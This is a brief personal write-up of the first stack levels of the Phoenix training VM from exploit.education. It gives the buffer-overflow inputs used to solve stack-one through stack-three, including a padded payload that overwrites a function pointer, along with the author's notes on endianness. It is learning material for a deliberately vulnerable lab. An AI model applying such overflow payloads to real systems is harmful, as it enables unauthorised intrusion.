WriteUp: Phoenix Exploit.Education

Writeup for the Phoenix VM from http://exploit.education/phoenix/.

stack-one
python -c 'print 64*"A"'

stack-two
export ExploitEducation=$"cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r"

learned about endianess here. really missing some of the basic computer science stuff, but well coming to it…

stack-three
user@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "c"*64+"\x9d\x06@"' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you’ve finished phoenix/stack-three :-) Well done!

After researching for escaping ascii chars forever it seemed to me… but the \xHEXCODE notation ist pretty good to remember http://defindit.com/ascii.html

tbc

Leave a Comment